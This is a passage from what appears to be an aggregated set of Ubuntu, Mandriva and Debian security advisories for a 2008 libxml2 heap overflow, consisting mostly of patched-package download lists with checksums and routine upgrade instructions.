      Size/MD5:  1014608 676fed67244fe42800b527d2d654365f
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_amd64.deb
      Size/MD5:   777674 72fd0dc6223b0708f936bfbf830b42a4
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_amd64.udeb
      Size/MD5:   607400 82a0a91ff27913e1284ae7799156b9a5
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_amd64.deb
      Size/MD5:    37346 b71638a425beef5adb16962d2dbf83f8
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_amd64.deb
      Size/MD5:   863410 2141203bc6e460099878831efdc9de8e
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_amd64.deb
      Size/MD5:   858904 3143613cc83f8f3b3fc171291e48f30c
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_amd64.deb
      Size/MD5:   296128 4f123d82f7393dc6271adee9b0b2154b
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_i386.deb
      Size/MD5:   966962 48d67569f459f88564f282c5c7603eca
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_i386.deb
      Size/MD5:   701786 f31b1ec9b00b32aef5dab08de74c1ca5
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_i386.udeb
      Size/MD5:   563618 6c10444d19aa3010ec0b6afc46631442
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_i386.deb
      Size/MD5:    33908 218bd1ab9dbed3bb7e56db1f1ac74a6a
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_i386.deb
      Size/MD5:   819242 f2e5722dc46494b105d2e171a7ab8230
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_i386.deb
      Size/MD5:   782502 c6a12f97a9d05c420e87d98f3cebe292
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_i386.deb
      Size/MD5:   261340 c1e353abc1bdf4c56b856228ea92e3ce
    

    lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_lpia.deb
      Size/MD5:   994030 e6260d0cfcac28075fcbe72036374dc1
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_lpia.deb
      Size/MD5:   697648 2e04c962dc20e83f635a5bf06fb87691
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_lpia.udeb
      Size/MD5:   553402 8998361080659f8d3175d3621261805a
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_lpia.deb
      Size/MD5:    34092 da760a43ac9492e508c6dc6c85499a95
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_lpia.deb
      Size/MD5:   808888 d3708ffd4d87a2c48c6c37badb602ec5
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_lpia.deb
      Size/MD5:   776836 ff4dee115d09816a99b2c7ea63e4fd10
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_lpia.deb
      Size/MD5:   257710 6e2cf4776d778dc7ce2d2a7c098c5bd7
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_powerpc.deb
      Size/MD5:   985370 5f1c540dbfecf08d6ccc22798beb7d0d
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_powerpc.deb
      Size/MD5:   793178 980f65e0877f36d1c51241ca6e8a4e79
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_powerpc.udeb
      Size/MD5:   582030 439fe7ebaebd3e5e3c9ca5b323595da6
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_powerpc.deb
      Size/MD5:    40426 648c47236b411a6b5ccbbe4ca4671af7
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_powerpc.deb
      Size/MD5:   837942 7a59d92fe6c31895aadc67df56e404b2
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_powerpc.deb
      Size/MD5:   822784 44a72a4996bca847bea424ad1db4d03b
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_powerpc.deb
      Size/MD5:   283028 9423c0b24aab87ffac1d85615282e38d
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_sparc.deb
      Size/MD5:   872662 fcc9c2574a5f8f9aeee5be43cedd9542
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_sparc.deb
      Size/MD5:   730988 dab6026cfeee8b30a3d7d7a989621cc1
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_sparc.udeb
      Size/MD5:   551174 de8a4e5e3c69eda8a888e2a4be0d8771
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_sparc.deb
      Size/MD5:    36538 b1c42f5d79806ca0ddb842d6e46589e4
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_sparc.deb
      Size/MD5:   807300 2ec0838cfed794ad0dfba8e6c2f8f5a6
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_sparc.deb
      Size/MD5:   795578 5177c5c668b1cb6ab972a42ba74ce69b
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_sparc.deb
      Size/MD5:   275720 848f0e32688509c20e716bf56854b3c2
    

    Updated packages for Ubuntu 9.04:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2.diff.gz
      Size/MD5:    86115 e8ae94cf06df5aa69bcb4e9e3478dc3a
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2.dsc
      Size/MD5:     1494 59db95aea21b88b40de41b4eb6286204
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg.orig.tar.gz
      Size/MD5:  3425843 bb11c95674e775b791dab2d15e630fa4
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.32.dfsg-5ubuntu4.2_all.deb
      Size/MD5:  1309904 8a177134aefda1c1803ee8cea7876987
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_amd64.deb
      Size/MD5:  1014666 7eecb75acf8cfe96f0d8ad00dc6cd0f7
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_amd64.deb
      Size/MD5:   777666 303a6a64d87e0666177f9ee63cf1a03c
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_amd64.udeb
      Size/MD5:   607592 f0abee0ba9c7cac159aa282ff04b968d
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_amd64.deb
      Size/MD5:    37356 e60cf6a423c951786da162ffe21132a1
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_amd64.deb
      Size/MD5:   864536 fd1367706366bfd805f692c39f331835
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_amd64.deb
      Size/MD5:   863456 0e646ecc8d3e8e72fc65739a4bae3de9
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_amd64.deb
      Size/MD5:   359004 6541b0c12852c3e490ddb20c06448eae
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_i386.deb
      Size/MD5:   967152 3bc76bac8a99f2bceca5169cf9394f2c
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_i386.deb
      Size/MD5:   701712 b3aa303a9b2fcdcbdcb62595a6876f86
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_i386.udeb
      Size/MD5:   563692 fbda90721b32837d401f72def5bae5d4
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_i386.deb
      Size/MD5:    33904 a3323cb518af641c59ea45369a65746f
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_i386.deb
      Size/MD5:   820722 d26fe8acb0a5aee307d06edae3e7e28a
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_i386.deb
      Size/MD5:   785386 afdcafaa8bac5e88aa4a13e0d749b2ea
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_i386.deb
      Size/MD5:   324412 bae919ee044ef9aaf19656b9d1976b19
    

    lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_lpia.deb
      Size/MD5:   994408 53e4d8355d376154e295df19d3a3c60d
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_lpia.deb
      Size/MD5:   697522 5222a56651f77e522ca0ad1c6d6d5de6
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_lpia.udeb
      Size/MD5:   553434 48f46f951b7ebc278e84ad661d306f19
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_lpia.deb
      Size/MD5:    34098 60966a769f8d75d8bc8253c687e38244
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_lpia.deb
      Size/MD5:   810434 585824abaa30b7726f8e7beeae6150eb
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_lpia.deb
      Size/MD5:   778354 6588b53390d8a294fc18ab6624e6c7c1
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_lpia.deb
      Size/MD5:   320608 cb34801b64a53678cc553625fec3feaf
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_powerpc.deb
      Size/MD5:   985248 ecf8b6d8401aebd949116cb0169a96fe
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_powerpc.deb
      Size/MD5:   793242 1fc757dad96c16d285df20a5137af4c6
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_powerpc.udeb
      Size/MD5:   582210 87a282cc9ab3bf5af1015ce0624d01d9
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_powerpc.deb
      Size/MD5:    40434 3e24add8c4c0aaf0b7931dd185394d6d
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_powerpc.deb
      Size/MD5:   839218 0b75a09404be80b49058058c2aa6e746
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_powerpc.deb
      Size/MD5:   825710 58709b2af622ff835b15f799cd47fcfe
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_powerpc.deb
      Size/MD5:   344720 c07c4729d2191cf51d85654a83e8faf2
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_sparc.deb
      Size/MD5:   872512 b6f95a836cabc34e1266b76cc250a9e0
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_sparc.deb
      Size/MD5:   730870 607909857dea94afe8102a7131595252
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_sparc.udeb
      Size/MD5:   551000 7fbe08e3223c9543645eadb4b9e0167a
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_sparc.deb
      Size/MD5:    36486 c3540c5aadb1adc3f85f6276a1980d0c
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_sparc.deb
      Size/MD5:   807954 a3ac3191b768e4b6e1e7b1c279b26a13
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_sparc.deb
      Size/MD5:   798558 dd9c4b6bf81302a938f71ed0f9cf47c8
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_sparc.deb
      Size/MD5:   338152 674bae887b0ae673dd4732498c5a738c
    

    . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


    Mandriva Linux Security Advisory MDVSA-2008:192 http://www.mandriva.com/security/


    Package : libxml2 Date : September 11, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0


    Problem Description:

    A heap-based buffer overflow was found in how libxml2 handled long XML entity names.

    The updated packages have been patched to prevent this issue. As well, the patch to fix CVE-2008-3281 has been updated to remove the hard-coded entity limit that was set to 5M, instead using XML entity density heuristics. Many thanks to Daniel Veillard of Red Hat for his hard work in tracking down and dealing with the edge cases discovered with the initial fix to this issue.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529


    Updated Packages:

    Mandriva Linux 2007.1: 9250adec77a5118119d5000f2305540f 2007.1/i586/libxml2-2.6.27-3.4mdv2007.1.i586.rpm 103dba08606f0038f3a9f4107ceba442 2007.1/i586/libxml2-devel-2.6.27-3.4mdv2007.1.i586.rpm a388bf596ef6725fb5baadb4e056a0bd 2007.1/i586/libxml2-python-2.6.27-3.4mdv2007.1.i586.rpm d2333e42a538101e36eab7d12467e08b 2007.1/i586/libxml2-utils-2.6.27-3.4mdv2007.1.i586.rpm 94a25c63f54693b7ac289223a6a3a687 2007.1/SRPMS/libxml2-2.6.27-3.4mdv2007.1.src.rpm

    Mandriva Linux 2007.1/X86_64: 343f8656039b69716fe712eeb2d1bf4e 2007.1/x86_64/lib64xml2-2.6.27-3.4mdv2007.1.x86_64.rpm 320d8dd8245f5ec6db46bedaf07afb3e 2007.1/x86_64/lib64xml2-devel-2.6.27-3.4mdv2007.1.x86_64.rpm fb6f52df6831cda42db46502cc761475 2007.1/x86_64/lib64xml2-python-2.6.27-3.4mdv2007.1.x86_64.rpm 8440fc08fee99f18a81a32035fac166a 2007.1/x86_64/libxml2-utils-2.6.27-3.4mdv2007.1.x86_64.rpm 94a25c63f54693b7ac289223a6a3a687 2007.1/SRPMS/libxml2-2.6.27-3.4mdv2007.1.src.rpm

    Mandriva Linux 2008.0: c53b40d9c7ebec036f9175c8f4e87b3b 2008.0/i586/libxml2_2-2.6.30-1.4mdv2008.0.i586.rpm 4a4ed97086b52cab3bbd34fe4d7003a0 2008.0/i586/libxml2-devel-2.6.30-1.4mdv2008.0.i586.rpm d3898465dc2797a2b20be8310dd4f484 2008.0/i586/libxml2-python-2.6.30-1.4mdv2008.0.i586.rpm 34c524fa03b470093bd0b0c679bcb9c4 2008.0/i586/libxml2-utils-2.6.30-1.4mdv2008.0.i586.rpm 2dc2f4732992e27aea4c5a098c631ae8 2008.0/SRPMS/libxml2-2.6.30-1.4mdv2008.0.src.rpm

    Mandriva Linux 2008.0/X86_64: 20ac98b346a1f18b90504cb623c530d8 2008.0/x86_64/lib64xml2_2-2.6.30-1.4mdv2008.0.x86_64.rpm fd5907e801bf4f64ee79d097fcaec2b6 2008.0/x86_64/lib64xml2-devel-2.6.30-1.4mdv2008.0.x86_64.rpm 20f45401e501b9639a9b53d82a4e031f 2008.0/x86_64/libxml2-python-2.6.30-1.4mdv2008.0.x86_64.rpm 22be20e194ba2177a47d831ee8c82f47 2008.0/x86_64/libxml2-utils-2.6.30-1.4mdv2008.0.x86_64.rpm 2dc2f4732992e27aea4c5a098c631ae8 2008.0/SRPMS/libxml2-2.6.30-1.4mdv2008.0.src.rpm

    Mandriva Linux 2008.1: 61e96824adc6e61b2764bb3a85e2e76d 2008.1/i586/libxml2_2-2.6.31-1.3mdv2008.1.i586.rpm 6d0cc51d32c7b6ecd609250aad302034 2008.1/i586/libxml2-devel-2.6.31-1.3mdv2008.1.i586.rpm 1e7c4ddd30677789de05cc464dde9790 2008.1/i586/libxml2-python-2.6.31-1.3mdv2008.1.i586.rpm edd477e34b08f94956eeedd387b5e509 2008.1/i586/libxml2-utils-2.6.31-1.3mdv2008.1.i586.rpm b1078a83185c1c97fada7ea5e97df753 2008.1/SRPMS/libxml2-2.6.31-1.3mdv2008.1.src.rpm

    Mandriva Linux 2008.1/X86_64: 9d25e809ad31decb111a38301b2a74c1 2008.1/x86_64/lib64xml2_2-2.6.31-1.3mdv2008.1.x86_64.rpm f35af82dffc02628edb1ce03113c3ba0 2008.1/x86_64/lib64xml2-devel-2.6.31-1.3mdv2008.1.x86_64.rpm 5819b393de9ff05be4d670c8e5d36080 2008.1/x86_64/libxml2-python-2.6.31-1.3mdv2008.1.x86_64.rpm fb670bfb1a1673f99f3c3fc3a72b7777 2008.1/x86_64/libxml2-utils-2.6.31-1.3mdv2008.1.x86_64.rpm b1078a83185c1c97fada7ea5e97df753 2008.1/SRPMS/libxml2-2.6.31-1.3mdv2008.1.src.rpm

    Corporate 3.0: 82e733037c09b4b7770f5325c7ed1325 corporate/3.0/i586/libxml2-2.6.6-1.5.C30mdk.i586.rpm d66da7916f188883fd164cb250431bba corporate/3.0/i586/libxml2-devel-2.6.6-1.5.C30mdk.i586.rpm 5df28181424b19132bbff6afa872475a corporate/3.0/i586/libxml2-python-2.6.6-1.5.C30mdk.i586.rpm f7a86c3be6e4926fa101386a9cbbcbdd corporate/3.0/i586/libxml2-utils-2.6.6-1.5.C30mdk.i586.rpm c64826e1b31ed0c5d4514780ecd52e2e corporate/3.0/SRPMS/libxml2-2.6.6-1.5.C30mdk.src.rpm

    Corporate 3.0/X86_64: 76e631bd88c68085dc2c5702235c2a99 corporate/3.0/x86_64/lib64xml2-2.6.6-1.5.C30mdk.x86_64.rpm 827f9f5bc3a1b869353e3c09879ea432 corporate/3.0/x86_64/lib64xml2-devel-2.6.6-1.5.C30mdk.x86_64.rpm caafa3371f80f084e8a945b3114b4533 corporate/3.0/x86_64/lib64xml2-python-2.6.6-1.5.C30mdk.x86_64.rpm e37a70f9cd13a7e00982387a9ba97726 corporate/3.0/x86_64/libxml2-utils-2.6.6-1.5.C30mdk.x86_64.rpm c64826e1b31ed0c5d4514780ecd52e2e corporate/3.0/SRPMS/libxml2-2.6.6-1.5.C30mdk.src.rpm

    Corporate 4.0: 74eea161b5519eef6c16b2407126a847 corporate/4.0/i586/libxml2-2.6.21-3.4.20060mlcs4.i586.rpm 5d8d1e0e487022687c1c61fbaf91707e corporate/4.0/i586/libxml2-devel-2.6.21-3.4.20060mlcs4.i586.rpm d5aa677468c9e8baae074a12f6c63c00 corporate/4.0/i586/libxml2-python-2.6.21-3.4.20060mlcs4.i586.rpm d51b4b902bb911be69f6a17aeb07d8cf corporate/4.0/i586/libxml2-utils-2.6.21-3.4.20060mlcs4.i586.rpm ce28651304236296e59d6d3be5525889 corporate/4.0/SRPMS/libxml2-2.6.21-3.4.20060mlcs4.src.rpm

    Corporate 4.0/X86_64: 812f2ae0ffa7a72546b07bd7de174453 corporate/4.0/x86_64/lib64xml2-2.6.21-3.4.20060mlcs4.x86_64.rpm 23ae06098f957e46affa75220cac50af corporate/4.0/x86_64/lib64xml2-devel-2.6.21-3.4.20060mlcs4.x86_64.rpm 93cb252dadfadd4249062f903e604f82 corporate/4.0/x86_64/lib64xml2-python-2.6.21-3.4.20060mlcs4.x86_64.rpm aeff512a1b349108017e93633fabcf08 corporate/4.0/x86_64/libxml2-utils-2.6.21-3.4.20060mlcs4.x86_64.rpm ce28651304236296e59d6d3be5525889 corporate/4.0/SRPMS/libxml2-2.6.21-3.4.20060mlcs4.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

    You can view other update advisories for Mandriva Linux at:

    http://www.mandriva.com/security/advisories

    If you want to report vulnerabilities, please contact

    security_(at)_mandriva.com


    Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux)

    iD8DBQFIyaCLmqjQ0CJFipgRApioAJ9P7O5hzNQ4UuYvEIhTVLyyn9Tv9wCg4DSp mZuI5mJOfDomJXN1l5E7NSw= =tPwM -----END PGP SIGNATURE----- . This could allow the execution of arbitrary code via a malicious XML file.

    For the stable distribution (etch), this problem has been fixed in version 2.6.27.dfsg-5.

    For the unstable distribution (sid), this problem has been fixed in version 2.6.32.dfsg-4.

    We recommend that you upgrade your libxml2 package.

    Upgrade instructions


    wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

    If you are using the apt-get package manager, use the line for sources.list as given below:

    apt-get update will update the internal database apt-get upgrade will install corrected packages

    You may use an automated update by adding the resources from the footer to the proper configuration.

    Debian GNU/Linux 4.0 alias etch


    Source archives:

    http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.diff.gz Size/MD5 checksum: 220443 48cafbb8d1bd2c6093339fea3f14e4a0 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg.orig.tar.gz Size/MD5 checksum: 3416175 5ff71b22f6253a6dd9afc1c34778dec3 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.dsc Size/MD5 checksum: 893 0dc1f183dd20741e5b4e26a7f8e1c652

    Architecture independent packages:

    http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-doc_2.6.27.dfsg-5_all.deb Size/MD5 checksum: 1328144 c1c5f0ceb391893a94e61c074b677ee9

    alpha architecture (DEC Alpha)

    http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 820850 fac5556241bb0fde20913f25fb9c73ac http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 37980 725b1c6925e610b5843ba0ad554dc7bc http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 184754 5ccbaf07b44dcfe528167074050bf270 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 916830 17d71480b7e2a447dabde99c11d752fa http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 881834 cac19a28b37f7afb9e07966f44ddd5b2

    amd64 architecture (AMD x86_64 (AMD64))

    http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 184130 a13372752d162d0fb2ccd58da6b73e20 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 36684 8a0265229bebf9245dc7bb7cc6f41d36 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 796194 6019e59020269cca8fa8fea40f83c118 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 891922 606fc28448bead2709c39a1d3e529a25 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 745758 95bd39eb2818772c43c3351b22326fcd

    arm architecture (ARM)

    http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 741876 1b670c6bac3aa9f7df28f7ea3f1e5725 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 34678 9a992dc251b137a919a813eed2af8489 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 165290 732b4e94b91a086c6b950d187af160bc http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 817514 299c93a812ac02a8aa9da88f4cb5aedf http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 673192 d2ff2c26ee8dae05f81c24aa6dfce9b5

    hppa architecture (HP PA RISC)

    http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_hppa.deb Size/MD5 checksum: 191876 4d2e33090237b47bc10e9526329f0bc5 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_hppa.deb Size/MD5 checksum: 36708 0ebf8554c5a0e873b128d52ceafccdfd http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_hppa.deb Size/MD5 checksum: 850210 bde343770ac9a7bd458e68a60c2b8434 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_hppa.deb Size/MD5 checksum: 858660 88f67d0d2aff41333ca2f4d4b2d6b5b2 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_hppa.deb Size/MD5 checksum: 864474 489dbd9d677c274c07abb88d0f23b969

    i386 architecture (Intel ia32)

    http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_i386.deb Size/MD5 checksum: 755986 9fdf341ede17d7790202229db9cc1353 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_i386.deb Size/MD5 checksum: 169032 272c6be290817bf9cb8b401425fd83d5 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_i386.deb Size/MD5 checksum: 681472 d8a0611d638e0553da64a218fbcf291a http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_i386.deb Size/MD5 checksum: 857318 6946048170dd7d142c03c13794c30d6f http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_i386.deb Size/MD5 checksum: 34496 3e3674a714f780024630ad1a2ca46eab

    ia64 architecture (Intel ia64)

